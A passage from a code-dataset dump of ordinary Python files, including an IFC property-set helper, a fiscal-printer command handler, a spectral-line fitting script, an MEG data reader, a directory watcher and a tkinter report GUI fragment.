ifcopenshell.util.schema\nfrom ifcopenshell.entity_instance import entity_instance\nfrom functools import lru_cache\nfrom typing import List, Generator, Optional\n\ntemplates = {}\n\n\ndef get_template(schema):\n global templates\n if schema not in templates:\n templates[schema] = PsetQto(schema)\n return templates[schema]\n\n\nclass PsetQto:\n templates_path = {\n \"IFC4\": \"Pset_IFC4_ADD2.ifc\",\n }\n\n def __init__(self, schema: str, templates=None) -> None:\n self.schema = ifcopenshell.ifcopenshell_wrapper.schema_by_name(schema)\n if not templates:\n folder_path = pathlib.Path(__file__).parent.absolute()\n path = str(folder_path.joinpath(\"schema\", self.templates_path[schema]))\n templates = [ifcopenshell.open(path)]\n self.templates = templates\n\n @lru_cache()\n def get_applicable(\n self, ifc_class=\"\", predefined_type=\"\", pset_only=False, qto_only=False\n ) -> List[entity_instance]:\n any_class = not ifc_class\n if not any_class:\n entity = self.schema.declaration_by_name(ifc_class)\n result = []\n for template in self.templates:\n for prop_set in template.by_type(\"IfcPropertySetTemplate\"):\n if pset_only:\n if prop_set.Name.startswith(\"Qto_\"):\n continue\n if qto_only:\n if not prop_set.Name.startswith(\"Qto_\"):\n continue\n if any_class or self.is_applicable(entity, prop_set.ApplicableEntity or \"IfcRoot\", predefined_type):\n result.append(prop_set)\n return result\n\n @lru_cache()\n def get_applicable_names(self, ifc_class: str, predefined_type=\"\", pset_only=False, qto_only=False) -> List[str]:\n \"\"\"Return names instead of objects for other use eg. enum\"\"\"\n return [prop_set.Name for prop_set in self.get_applicable(ifc_class, predefined_type, pset_only, qto_only)]\n\n def is_applicable(self, entity: entity_instance, applicables: str, predefined_type=\"\") -> bool:\n \"\"\"applicables can have multiple possible patterns :\n IfcBoilerType (IfcClass)\n IfcBoilerType/STEAM (IfcClass/PREDEFINEDTYPE)\n IfcBoilerType[PerformanceHistory] (IfcClass[PerformanceHistory])\n IfcBoilerType/STEAM[PerformanceHistory] (IfcClass/PREDEFINEDTYPE[PerformanceHistory])\n \"\"\"\n for applicable in applicables.split(\",\"):\n match = re.match(r\"(\\w+)(\\[\\w+\\])*/*(\\w+)*(\\[\\w+\\])*\", applicable)\n if not match:\n continue\n # Uncomment if usage found\n # applicable_perf_history = match.group(2) or match.group(4)\n if predefined_type and predefined_type != match.group(3):\n continue\n\n applicable_class = match.group(1)\n if ifcopenshell.util.schema.is_a(entity, applicable_class):\n return True\n return False\n\n @lru_cache()\n def get_by_name(self, name: str) -> Optional[entity_instance]:\n for template in self.templates:\n for prop_set in template.by_type(\"IfcPropertySetTemplate\"):\n if prop_set.Name == name:\n return prop_set\n return None\n\n def is_templated(self, name: str) -> bool:\n return bool(self.get_by_name(name))\n","repo_name":"vulevukusej/BlenderBIM","sub_path":"standalone scripts for ifcopenshell/ifcopenshell/util/pset.py","file_name":"pset.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"28127332571","text":"# coding=utf-8\n\nimport json\nimport Configberry\nimport importlib\nimport socket\nimport threading\nimport tornado.ioloop\nimport os\nfrom multiprocessing import Process, Queue, Pool\n\nimport sys\nif sys.platform == 'win32':\n import multiprocessing.reduction # make sockets pickable/inheritable\n\n\nINTERVALO_IMPRESORA_WARNING = 30.0\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef set_interval(func, sec):\n def func_wrapper():\n set_interval(func, sec)\n func()\n\n t = threading.Timer(sec, func_wrapper)\n t.start()\n return t\n\n\n# es un diccionario como clave va el nombre de la impresora que funciona como cola\n# cada KEY es una printerName y contiene un a instancia de TraductorReceipt o TraductorFiscal dependiendo\n# si la impresora es fiscal o receipt\n\nclass TraductorException(Exception):\n pass\n\n\n\ndef init_printer_traductor(printerName):\n config = Configberry.Configberry()\n\n try:\n dictSectionConf = config.get_config_for_printer(printerName)\n except KeyError as e:\n raise TraductorException(\"En el archivo de configuracion no existe la impresora: '%s'\" % printerName)\n\n marca = dictSectionConf.get(\"marca\")\n del dictSectionConf['marca']\n # instanciar los comandos dinamicamente\n libraryName = \"Comandos.\" + marca + \"Comandos\"\n comandoModule = importlib.import_module(libraryName)\n comandoClass = getattr(comandoModule, marca + \"Comandos\")\n \n comando = comandoClass(**dictSectionConf)\n return comando.traductor\n\ndef runTraductor(jsonTicket, queue):\n logging.info(\"mandando comando de impresora\")\n printerName = jsonTicket['printerName']\n traductor = init_printer_traductor(printerName)\n\n if traductor:\n if traductor.comando.conector is not None:\n queue.put(traductor.run(jsonTicket))\n else:\n strError = \"el Driver no esta inicializado para la impresora %s\" % printerName\n queue.put(strError)\n logging.error(strError)\n\n\n\n\nclass TraductoresHandler:\n \"\"\"Convierte un JSON a Comando Fiscal Para Cualquier tipo de Impresora fiscal\"\"\"\n\n traductores = {}\n fbApp = None\n\n config = Configberry.Configberry()\n webSocket = None\n\n def __init__(self, webSocket = None, fbApp = None):\n self.webSocket = webSocket\n self.fbApp = fbApp\n\n\n\n\n def json_to_comando(self, jsonTicket):\n import time \n traductor = None\n \n try:\n \"\"\" leer y procesar una factura en formato JSON\n \"\"\"\n logging.info(\"Iniciando procesamiento de json:::: \"+json.dumps(jsonTicket))\n\n rta = {\"rta\": \"\"}\n # seleccionar impresora\n # esto se debe ejecutar antes que cualquier otro comando\n if 'printerName' in jsonTicket:\n # run multiprocessing\n q = Queue()\n p = Process(target=runTraductor, args=(jsonTicket,q))\n p.daemon = True\n #p = MultiprocesingTraductor(traductorhandler=self, jsonTicket=jsonTicket, q=q)\n p.start()\n p.join()\n if q.empty() == False:\n rta[\"rta\"] = q.get(timeout=1)\n q.close()\n\n # aciones de comando genericos de Ststus y control\n elif 'getStatus' in jsonTicket:\n rta[\"rta\"] = self._getStatus()\n\n # reinicia\n elif 'reboot' in jsonTicket:\n rta[\"rta\"] = self._reboot()\n\n elif 'restart' in jsonTicket:\n rta[\"rta\"] = self._restartService()\n\n elif 'upgrade' in jsonTicket:\n rta[\"rta\"] = self._upgrade()\n\n elif 'getPrinterInfo' in jsonTicket:\n rta[\"rta\"] = self._getPrinterInfo(jsonTicket[\"getPrinterInfo\"])\n\n elif 'findAvaliablePrinters' in jsonTicket:\n self._findAvaliablePrinters()\n rta[\"rta\"] = self._getAvaliablePrinters()\n\n elif 'getAvaliablePrinters' in jsonTicket:\n rta[\"rta\"] = self._getAvaliablePrinters()\n\n elif 'getActualConfig' in jsonTicket:\n rta[\"rta\"] = self._getActualConfig()\n\n elif 'configure' in jsonTicket:\n rta[\"rta\"] = self._configure(**jsonTicket[\"configure\"])\n\n elif 'removerImpresora' in jsonTicket:\n rta[\"rta\"] = self._removerImpresora(jsonTicket[\"removerImpresora\"])\n\n else:\n\n logger.error(\"No se pasó un comando válido\")\n raise TraductorException(\"No se pasó un comando válido\")\n\n # cerrar el driver\n if traductor and traductor.comando:\n traductor.comando.close()\n\n return rta\n\n except Exception as e:\n # cerrar el driver\n if traductor and traductor.comando:\n traductor.comando.close()\n\n raise\n\n def getWarnings(self):\n \"\"\" Recolecta los warning que puedan ir arrojando las impresoraas\n devuelve un listado de warnings\n \"\"\"\n collect_warnings = {}\n for trad in self.traductores:\n if self.traductores[trad]:\n warn = self.traductores[trad].comando.getWarnings()\n if warn:\n collect_warnings[trad] = warn\n return collect_warnings\n\n def _upgrade(self):\n ret = self.fbApp.upgradeGitPull()\n print(ret)\n rta = {\n \"rta\": ret\n }\n self.fbApp.restart_service()\n return rta\n\n def _getPrinterInfo(self, printerName):\n rta = {\n \"printerName\": printerName,\n \"action\": \"getPrinterInfo\",\n \"rta\": self.config.get_config_for_printer(printerName)\n }\n print(rta)\n return rta\n\n def _restartService(self):\n \"\"\" Reinicializa el WS server tornado y levanta la configuracion nuevamente \"\"\"\n self.fbApp.restart_service()\n resdict = {\n \"action\": \"restartService\",\n \"rta\": \"servidor reiniciado\"\n }\n\n def _rebootFiscalberry(self):\n \"reinicia el servicio fiscalberry\"\n from subprocess import call\n\n resdict = {\n \"action\": \"rebootFiscalberry\",\n \"rta\": call([\"reboot\"])\n }\n\n return resdict\n\n def _configure(self, **kwargs):\n \"Configura generando o modificando el archivo configure.ini\"\n printerName = kwargs[\"printerName\"]\n propiedadesImpresora = kwargs\n if \"nombre_anterior\" in kwargs:\n self._removerImpresora(kwargs[\"nombre_anterior\"])\n del propiedadesImpresora[\"nombre_anterior\"]\n del propiedadesImpresora[\"printerName\"]\n self.config.writeSectionWithKwargs(printerName, propiedadesImpresora)\n\n return {\n \"action\": \"configure\",\n \"rta\": \"La seccion \"+printerName+\" ha sido guardada\"\n }\n\n def _removerImpresora(self, printerName):\n \"elimina la sección del config.ini\"\n\n self.config.delete_printer_from_config(printerName)\n\n return {\n \"action\": \"removerImpresora\",\n \"rta\": \"La impresora \"+printerName+\" fue removida con exito\"\n }\n\n\n def _findAvaliablePrinters(self):\n # Esta función llama a otra que busca impresoras. Luego se encarga de escribir el config.ini con las impresoras encontradas.\n if os.geteuid() != 0:\n return {\"action\": \"findAvaliablePrinters\",\n \"rta\": \"Error, no es superusuario (%s)\" % os.geteuid()\n }\n\n self.__getPrintersAndWriteConfig()\n\n def _getAvaliablePrinters(self):\n\n # la primer seccion corresponde a SERVER, el resto son las impresoras\n rta = {\n \"action\": \"getAvaliablePrinters\",\n \"rta\": self.config.sections()[1:]\n }\n\n return rta\n\n def _getStatus(self, *args):\n\n resdict = {\"action\": \"getStatus\", \"rta\": {}}\n for tradu in self.traductores:\n if self.traductores[tradu]:\n resdict[\"rta\"][tradu] = \"ONLINE\"\n else:\n resdict[\"rta\"][tradu] = \"OFFLINE\"\n return resdict\n\n def __manejar_socket_error(self, err, jsonTicket, traductor):\n print(format(err))\n traductor.comando.conector.driver.reconnect()\n # volver a intententar el mismo comando\n try:\n rta[\"rta\"] = traductor.run(jsonTicket)\n return rta\n except Exception:\n # ok, no quiere conectar, continuar sin hacer nada\n print(\"No hay caso, probe de reconectar pero no se pudo\")\n\n def _getActualConfig(self):\n rta = {\n \"action\": \"getActualConfig\",\n \"rta\": self.config.get_actual_config()\n }\n\n return rta\n","repo_name":"paxapos/fiscalberry","sub_path":"Traductores/TraductoresHandler.py","file_name":"TraductoresHandler.py","file_ext":"py","file_size_in_byte":8765,"program_lang":"python","lang":"es","doc_type":"code","stars":54,"dataset":"github-code","pt":"48"} +{"seq_id":"35398136113","text":"import numpy as np\nimport VoigtFit\nimport matplotlib\nmatplotlib.use(\"GTKAgg\")\n\n\n# -- Add the redshift of the cloud doing the absorption\n# Estimating 0 for everything.\nz = 0.0\n\ndataset = VoigtFit.DataSet(z)\ndataset.set_name(\"NGC3125-SiIV\")\ndataset.verbose = True\n\n\n# -- If log(NHI) is not known use:\nlogNHI = None\n\n\n# -- Rebin the data set by 3 pixels\n\ndef downsample_1d(myarr,factor):\n \"\"\"\n Downsample a 1D array by averaging over *factor* pixels.\n Crops right side if the shape is not a multiple of factor.\n\n Got this specific function from \"Adam Ginsburgs python codes\" on agpy\n myarr : numpy array\n\n factor : how much you want to rebin the array by\n \"\"\"\n xs = myarr.shape[0]\n crarr = myarr[:xs-(xs % int(factor))]\n dsarr = np.mean( np.concatenate(\n [[crarr[i::factor] for i in range(factor)] ]\n ),axis=0)\n\n return dsarr\n\n\n# -- Load the COS data (G130M and G160M if available) in ASCII format:\nG130M_filename = \"/Users/efrazer/leadingarm/sightlines/NGC3125/NGC3125-G130M\"\n\nres_g130m = 16000.\n\nwl_g130m, spec_g130m, err_g130m = np.loadtxt(G130M_filename, unpack=True)\n\nwl_g130m_rb = downsample_1d(wl_g130m, 3)\nspec_g130m_rb = downsample_1d(spec_g130m, 3)\nerr_g130m_rb = downsample_1d(err_g130m, 3)\n\ndataset.add_data(wl_g130m_rb, spec_g130m_rb, 299792.458/res_g130m, err=err_g130m_rb, normalized=False)\n\n# Night only data:\n# G130M_filename_n = \"/Users/efrazer/leadingarm/sightlines/NGC3125/NGC3125-G130M-N\"\n#\n# res_g130m_n = 16000.\n#\n# wl_g130m_n, spec_g130m_n, err_g130m_n = np.loadtxt(G130M_filename_n, unpack=True)\n#\n# wl_g130m_rb_n = downsample_1d(wl_g130m_n, 3)\n# spec_g130m_rb_n = downsample_1d(spec_g130m_n, 3)\n# err_g130m_rb_n = downsample_1d(err_g130m_n, 3)\n#\n# dataset.add_data(wl_g130m_rb_n, spec_g130m_rb_n, 299792.458/res_g130m, err=err_g130m_rb_n, normalized=False)\n\n\n# -- Change the width of velocity search region\ndataset.velspan = 500.0\n\n\n# -- Add the ions we want to fit\n\n# ION WAVELENGTH F_VALUE\n# C II 1334.5323 0.127800\n# C IV 1548.2049 1.908E-01\n# C IV 1550.7785 9.522E-02\n# SiIV 1393.7550 5.280E-01\n# SiIV 1402.7700 2.620E-01\n# SiIII 1206.5000 1.660E+00\n# SiII 1260.4221 1.007E+00\n# SiII 1193.2897 4.991E-01\n# SiII 1190.4158 2.502E-01\n\n# dataset.add_line(\"CII_1334\")\n# dataset.add_line(\"SiII_1260\")\n# dataset.add_line(\"SiII_1193\") # blended\n# dataset.add_line(\"SiII_1190\") # blended\n# dataset.add_line(\"SiIII_1206\")\ndataset.add_line(\"SiIV_1393\")\ndataset.add_line(\"SiIV_1402\")\n# dataset.add_line(\"OI_1302\")\n\n# NOTES ABOUT THE DETECTIONS:\n# log N(C II) is an upper limit. Line is blended.\n# log N(Si IV) is an upper limit. Line is blended.\n\n\n# -- Add MW components for each ion:\n\n# SiII\n# ion z b logN\n# dataset.add_component(\"SiII\", 0., 60.0, 13.8, var_z=1, var_b=1, var_N=1)\n# dataset.add_component_velocity(\"SiII\", 120, 20.0, 13.1, var_z=1, var_b=1, var_N=1)\n# dataset.add_component_velocity(\"SiII\", 190, 30.0, 13.1, var_z=1, var_b=1, var_N=1)\n\n# SiIII\n# dataset.add_component(\"SiIII\", 0., 60.0, 13.8, var_z=1, var_b=1, var_N=1)\n# dataset.add_component_velocity(\"SiIII\", 120, 20.0, 13.1, var_z=1, var_b=1, var_N=1)\n# dataset.add_component_velocity(\"SiIII\", 190, 30.0, 13.1, var_z=1, var_b=1, var_N=1)\n# dataset.add_component_velocity(\"SiIII\", 210, 30.0, 13.1, var_z=1, var_b=1, var_N=1)\n\n# Si IV\ndataset.add_component(\"SiIV\", 0., 47.0, 13.5, var_z=1, var_b=1, var_N=1)\n# dataset.add_component_velocity(\"SiIV\", 110, 15.0, 12.1, var_z=1, var_b=1, var_N=1)\ndataset.add_component_velocity(\"SiIV\", 200, 15.0, 12.1, var_z=1, var_b=1, var_N=1)\n\n# OI\n# dataset.add_component(\"OI\", 0., 40.0, 14.8, var_z=1, var_b=1, var_N=1)\n# dataset.add_component_velocity(\"OI\", 110, 40.0, 14.1, var_z=1, var_b=1, var_N=1)\n# dataset.add_component_velocity(\"OI\", 200, 30.0, 14.1, var_z=1, var_b=1, var_N=1)\n\n\n# -- Prepare the dataset: This will prompt the user for interactive\n# masking and normalization, as well as initiating the Parameters:\n\ndataset.cheb_order = 1\n# dataset.cheb_order = -1\n# dataset.norm_method = 'spline'\ndataset.prepare_dataset(norm=True, mask=True)\n\n\n# -- Fit the dataset:\npopt, chi2 = dataset.fit()\n\ndataset.plot_fit(filename=\"NGC3125-SiIV.pdf\", max_rows=6)\n\n\n# -- Save the dataset to file: taken from the dataset.name\ndataset.save()\ndataset.save_parameters(\"NGC3125-SiIV.fit\")\ndataset.save_cont_parameters_to_file(\"NGC3125-SiIV.cont\")\ndataset.save_fit_regions(\"NGC3125-SiIV.reg\")\n\n","repo_name":"emsnyder/leadingarm","sub_path":"sightlines/NGC3125/badfits/vf_NGC3125.py","file_name":"vf_NGC3125.py","file_ext":"py","file_size_in_byte":4474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30233984469","text":"#!/usr/bin/python\n\"\"\"\n@author: goneill\n\"\"\"\n\nimport json\nimport numpy as np\nimport os.path as op\nfrom collections import OrderedDict\n\nfrom mne.io.constants import FIFF\nfrom mne.io.meas_info import _empty_info\nfrom mne.io.write import get_new_file_id\nfrom mne.io.base import BaseRaw\nfrom mne.io.utils import _read_segments_file\nfrom mne.io._digitization import _make_dig_points\nfrom mne.transforms import get_ras_to_neuromag_trans, apply_trans, Transform\nfrom mne.utils import warn\n\nfrom .utils import _refine_sensor_orientation, _determine_position_units, _size2units, _get_plane_vectors\n\ndef read_raw_ucl(binfile, precision='single', preload=False):\n return RawUCL(binfile, precision=precision, preload=preload)\n\nclass RawUCL(BaseRaw):\n def __init__(self, binfile, precision='single', preload=False):\n \n if precision == 'single':\n dt = np.dtype('>f')\n bps = 4\n else:\n dt = np.dtype('>d')\n bps = 8\n \n \n sample_info = dict()\n sample_info['dt'] = dt\n sample_info['bps'] = bps\n \n files = _get_file_names(binfile)\n \n chans = _from_tsv(files['chans'])\n chanpos = _from_tsv(files['positions'])\n nchans = len(chans['name'])\n nlocs = len(chanpos['name'])\n nsamples = _determine_nsamples(files['bin'], nchans, precision) - 1\n sample_info['nsamples'] = nsamples\n \n raw_extras = list()\n raw_extras.append(sample_info)\n \n chans['pos'] = [None] * nchans\n chans['ori'] = [None] * nchans \n \n for ii in range(0,nlocs):\n idx = chans['name'].index(chanpos['name'][ii])\n tmp = np.array([chanpos['Px'][ii], chanpos['Py'][ii], chanpos['Pz'][ii]])\n chans['pos'][idx] = tmp.astype(np.float64)\n tmp = np.array([chanpos['Ox'][ii], chanpos['Oy'][ii], chanpos['Oz'][ii]])\n chans['ori'][idx] = tmp.astype(np.float64)\n \n fid = open(files['meg'],'r')\n meg = json.load(fid)\n fid.close()\n info = _compose_meas_info(meg, chans)\n \n super(RawUCL, self).__init__(\n info, preload, filenames=[files['bin']],raw_extras=raw_extras,\n last_samps=[nsamples], orig_format=precision)\n \n if op.exists(files['coordsystem']):\n fid = open(files['coordsystem'],'r')\n csys = json.load(fid)\n fid.close()\n hc = csys['HeadCoilCoordinates']\n \n for key in hc:\n if key == 'lpa' or key == 'LPA':\n lpa = np.asarray(hc[key])\n elif key == 'rpa' or key == 'RPA':\n rpa = np.asarray(hc[key])\n elif key == 'nas' or key == 'NAS' or key == 'nasion':\n nas = np.asarray(hc[key])\n else:\n warn(key + ' is not a valid fiducial name!')\n \n \n siz = np.linalg.norm(nas - rpa)\n unit, sf = _size2units(siz) \n lpa/=sf\n rpa/=sf\n nas/=sf\n \n t = get_ras_to_neuromag_trans(nas, lpa, rpa)\n \n # transform fiducial points\n nas = apply_trans(t, nas)\n lpa = apply_trans(t, lpa)\n rpa = apply_trans(t, rpa)\n \n with self.info._unlock():\n self.info['dig'] = _make_dig_points(nasion=nas,\n lpa=lpa,\n rpa=rpa,\n coord_frame='meg')\n else:\n print('no fiducials found, likely to cause problems later!')\n t = np.eye(4)\n \n with self.info._unlock():\n self.info['dev_head_t'] = \\\n Transform(FIFF.FIFFV_COORD_DEVICE,\n FIFF.FIFFV_COORD_HEAD, t)\n \n def _read_segment_file(self, data, idx, fi, start, stop, cals, mult):\n \"\"\"Read a chunk of raw data.\"\"\"\n si = self._raw_extras[fi]\n _read_segments_file(\n self, data, idx, fi, start, stop, cals, mult, dtype=si['dt'])\n \n\ndef _convert_channel_info(chans):\n nmeg = nstim = nmisc = nref = 0\n \n units, sf = _determine_position_units(chans['pos'])\n \n chs = list()\n for ii in range(0,len(chans['name'])):\n ch = dict(scanno=ii + 1, range=1., cal=1., loc=np.full(12, np.nan),\n unit_mul=FIFF.FIFF_UNITM_NONE, ch_name=chans['name'][ii],\n coil_type=FIFF.FIFFV_COIL_NONE) \n \n chs.append(ch)\n \n # create the channel information\n if chans['pos'][ii] is not None:\n r0 = chans['pos'][ii].copy()/sf # mm to m\n ez = chans['ori'][ii].copy()\n ez = ez/np.linalg.norm(ez)\n ex, ey = _get_plane_vectors(ez)\n ch['loc'] = np.concatenate([r0, ex, ey, ez])\n \n if chans['type'][ii] == 'MEGMAG':\n nmeg += 1\n ch.update(logno=nmeg, coord_frame=FIFF.FIFFV_COORD_DEVICE,\n kind=FIFF.FIFFV_MEG_CH, unit=FIFF.FIFF_UNIT_T,\n coil_type=FIFF.FIFFV_COIL_QUSPIN_ZFOPM_MAG2)\n elif chans['type'][ii] == 'MEGREFMAG':\n nref += 1\n ch.update(logno=nref, coord_frame=FIFF.FIFFV_COORD_UNKNOWN,\n kind=FIFF.FIFFV_REF_MEG_CH, unit=FIFF.FIFF_UNIT_T,\n coil_type=FIFF.FIFFV_COIL_QUSPIN_ZFOPM_MAG2)\n elif chans['type'][ii] == 'TRIG':\n nstim += 1\n ch.update(logno=nstim, coord_frame=FIFF.FIFFV_COORD_UNKNOWN,\n kind=FIFF.FIFFV_STIM_CH, unit=FIFF.FIFF_UNIT_V)\n else:\n nmisc += 1\n ch.update(logno=nmisc, coord_frame=FIFF.FIFFV_COORD_UNKNOWN,\n kind=FIFF.FIFFV_MISC_CH, unit=FIFF.FIFF_UNIT_NONE)\n \n \n # set the calibration based on the units - MNE expects T units for meg\n # and V for eeg\n if chans['units'][ii] == 'fT':\n ch.update(cal=1e-15)\n elif chans['units'][ii] == 'pT':\n ch.update(cal=1e-12)\n elif chans['units'][ii] == 'nT':\n ch.update(cal=1e-9)\n elif chans['units'][ii] == 'mV':\n ch.update(cal=1e3)\n elif chans['units'][ii] == 'uV':\n ch.update(cal=1e6)\n\n return chs\n\ndef _compose_meas_info(meg,chans):\n \"\"\"Create info structure\"\"\"\n info = _empty_info(meg['SamplingFrequency'])\n \n # Collect all the necessary data from the structures read\n info['meas_id'] = get_new_file_id()\n tmp = _convert_channel_info(chans)\n info['chs'] = _refine_sensor_orientation(tmp)\n # info['chs'] = _convert_channel_info(chans)\n info['line_freq'] = meg['PowerLineFrequency']\n info['bads'] = _read_bad_channels(chans)\n info._unlocked = False\n info._update_redundant()\n return info\n\ndef _determine_nsamples(bin_fname,nchans,precision):\n bsize = op.getsize(bin_fname)\n if precision == 'single':\n bps = 4\n else:\n bps = 8\n nsamples = int(bsize/(nchans*bps))\n return nsamples\n\ndef _read_bad_channels(chans):\n bads = list()\n for ii in range(0,len(chans['status'])):\n if chans['status'][ii] == 'bad':\n bads.append(chans['name'][ii])\n return bads\n \ndef _from_tsv(fname, dtypes=None):\n \"\"\"Read a tsv file into an OrderedDict.\n Parameters\n ----------\n fname : str\n Path to the file being loaded.\n dtypes : list, optional\n List of types to cast the values loaded as. This is specified column by\n column.\n Defaults to None. In this case all the data is loaded as strings.\n Returns\n -------\n data_dict : collections.OrderedDict\n Keys are the column names, and values are the column data.\n \"\"\"\n data = np.loadtxt(fname, dtype=str, delimiter='\\t', ndmin=2,\n comments=None, encoding='utf-8-sig')\n column_names = data[0, :]\n info = data[1:, :]\n data_dict = OrderedDict()\n if dtypes is None:\n dtypes = [str] * info.shape[1]\n if not isinstance(dtypes, (list, tuple)):\n dtypes = [dtypes] * info.shape[1]\n if not len(dtypes) == info.shape[1]:\n raise ValueError('dtypes length mismatch. Provided: {0}, '\n 'Expected: {1}'.format(len(dtypes), info.shape[1]))\n for i, name in enumerate(column_names):\n data_dict[name] = info[:, i].astype(dtypes[i]).tolist()\n return data_dict\n\ndef _get_file_names(binfile):\n \n files = dict();\n files['dir'] = op.dirname(binfile)\n\n tmp = op.basename(binfile)\n tmp = str.split(tmp,'_meg.bin')\n\n files['root'] = tmp[0];\n files['bin'] = op.join(files['dir'],files['root'] + '_meg.bin')\n files['meg'] = op.join(files['dir'],files['root'] + '_meg.json')\n files['chans'] = op.join(files['dir'],files['root'] + '_channels.tsv')\n files['positions'] = op.join(files['dir'],files['root'] + '_positions.tsv')\n files['coordsystem'] = op.join(files['dir'],files['root'] + '_coordsystem.json')\n \n return files","repo_name":"FIL-OPMEG/OPyM","sub_path":"opym/io/ucl.py","file_name":"ucl.py","file_ext":"py","file_size_in_byte":9199,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"6271187403","text":"import os\nimport argparse\nimport time\nimport datetime\nimport logging\nimport signal\nimport sys\n_author_ = \"Joey with help from demo videos and coaches\"\n\nif sys.version_info[0] < 3:\n raise RuntimeError(\"This program requires Python 3\")\n\n\"\"\"Global Variables\"\"\"\nlogger = logging.getLogger(__file__)\nexit_flag = False\nwatch_files = {}\nlast_position = 0\n\n\ndef watch_directory(args):\n \"\"\"Watches directory for magic text\"\"\"\n directory = args.path\n # logger.info('Watch Dir: {}, File Ext: {}, Polling Int: {}, Magic Txt: {}'\n # .format(directory, args.ext, args.interval, args.magic))\n\n file_list = [os.path.join(directory, f)\n for f in os.listdir(directory)]\n for file in file_list:\n if file not in watch_files and file.endswith(args.ext):\n watch_files[file] = 0\n logger.info('Watching new file: {}'.format(file))\n for file in list(watch_files):\n if file not in file_list:\n logger.info('Removed deleted file: {}'.format(file))\n del watch_files[file]\n for file in watch_files:\n last_line_num = find_magic(\n file, watch_files[file], args.magic)\n watch_files[file] = last_line_num\n time.sleep(args.interval)\n\n\ndef find_magic(filename, skip_to_line, magic_word):\n \"\"\"\n Read a file and looks for a magic text\n while logging a message if found.\n \"\"\"\n i = 0\n with open(filename) as f:\n for i, line in enumerate(f, start=1):\n if i < skip_to_line:\n continue\n if magic_word in line:\n logger.info(f'Found the {magic_word} on line {i} in {filename}')\n return i + 1\n\n\ndef create_parser():\n \"\"\"Creates and returns an argparse cmd line\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-e', '--ext', type=str, default='.txt',\n help='Text file extension to watch')\n parser.add_argument('-i', '--interval', type=float, default=1.0,\n help='How often to watch the text file')\n parser.add_argument('path', help='Directory to watch')\n parser.add_argument('magic', help='String to watch for')\n return parser\n\n\ndef signal_handler(sig_num, frame):\n \"\"\"\n This is a handler for SIGTERM and SIGINT.\n Other signals can be mapped here as well (SIGHUP?)\n Basically it just sets a global flag,\n and main() will exit it's loop if the signal is trapped.\n :param sig_num: The integer signal number that was trapped from the OS.\n :param frame: Not used\n :return None\n \"\"\"\n global exit_flag\n logger.warning('Received ' + signal.Signals(sig_num).name)\n if sig_num == signal.SIGINT or signal.SIGTERM:\n exit_flag = True\n\n\ndef main():\n logging.basicConfig(\n format='%(asctime)s.%(msecs)03d %(name)-12s %(levelname)-8s'\n '[%(threadName)-12s] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S'\n )\n logger.setLevel(logging.DEBUG)\n app_start_time = datetime.datetime.now()\n logger.info(\n '\\n'\n '----------------------------------------------------\\n'\n ' Running {0}\\n'\n ' Started on {1}\\n'\n '----------------------------------------------------\\n'\n .format(__file__, app_start_time.isoformat())\n )\n parser = create_parser()\n args = parser.parse_args()\n uptime = datetime.datetime.now() - app_start_time\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n\n logger.info('Watch Dir: {}, File Ext: {}, Polling Int: {}, Magic Txt: {}'\n .format(args.path, args.ext, args.interval, args.magic))\n\n while not exit_flag:\n try:\n watch_directory(args)\n except OSError as e:\n logger.error(e)\n except Exception as e:\n logger.exception('Unhandled exception: {}'.format(e))\n time.sleep(args.interval)\n\n logger.info(\n '\\n'\n '----------------------------------------------------\\n'\n ' Stopped {0}\\n'\n ' Uptime was {1}\\n'\n '----------------------------------------------------\\n'\n .format(__file__, str(uptime))\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Oejay94/dirwatcher","sub_path":"dirwatcher.py","file_name":"dirwatcher.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"736864725","text":"import re\nimport os\n# Set Functions and parameters\n## Extract elements into a list, and parse observations to elements\ndef extractLines(lst):\n return [el.split() for el in lst]\n\n## Perform multiple 1:1 string replacements using dict\ndef multipleReplace(dict, text):\n # Create a regular expression from the dictionary keys\n regex = re.compile(\"(%s)\" % \"|\".join(map(re.escape, dict.keys())))\n\n # For each match, look-up corresponding value in dictionary\n return regex.sub(lambda mo: dict[mo.string[mo.start():mo.end()]], text)\n\ndef makeDirFile(file):\n if not file.endswith('.csv'):\n outname = file + '.csv'\n else:\n outname = file\n\n parent = os.path.dirname(os.path.dirname(os.path.abspath('__file__')))\n outdir = parent + '/Data'\n\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n print('Created new directory:',outdir)\n\n return os.path.join(outdir, outname)\n\ndef makeOutFile(file):\n if not file.endswith('.png'):\n outname = file + '.png'\n else:\n outname = file\n\n parent = os.path.dirname(os.path.dirname(os.path.abspath('__file__')))\n outdir = parent + '/Outputs'\n\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n print('Created new directory:',outdir)\n\n return os.path.join(outdir,outname)\n","repo_name":"Caruychen/Climate_change_report","sub_path":"Wrangler.py","file_name":"Wrangler.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31154362525","text":"# Create the GUI\nroot = tk.Tk()\nroot.title(\"Report Generator\")\n\n# Report selector\nreport_label = tk.Label(root, text=\"Select Report:\")\nreport_label.pack()\nreport_selector = ttk.Combobox(root, values=[\n \"Clocked In Report\",\n \"Labor Report\",\n \"Sales Report\",\n \"Discounts Report\",\n \"Sales by Employee\",\n \"Tax Report\"\n])\nreport_selector.pack()\n\n# Date range selector\ndate_range_label = tk.Label(root, text=\"Select Date Range:\")\ndate_range_label.pack()\ndate_range_frame = ttk.Frame(root)\ndate_range_frame.pack()\n\nstart_date_label = ttk.Label(date_range_frame, text=\"Start Date:\")\nstart_date_label.grid(row=0, column=0)\nstart_date_entry = DateEntry(date_range_frame, date_pattern='dd-mm-yyyy')\nstart_date_entry.grid(row=0, column=1)\n\nend_date_label = ttk.Label(date_range_frame, 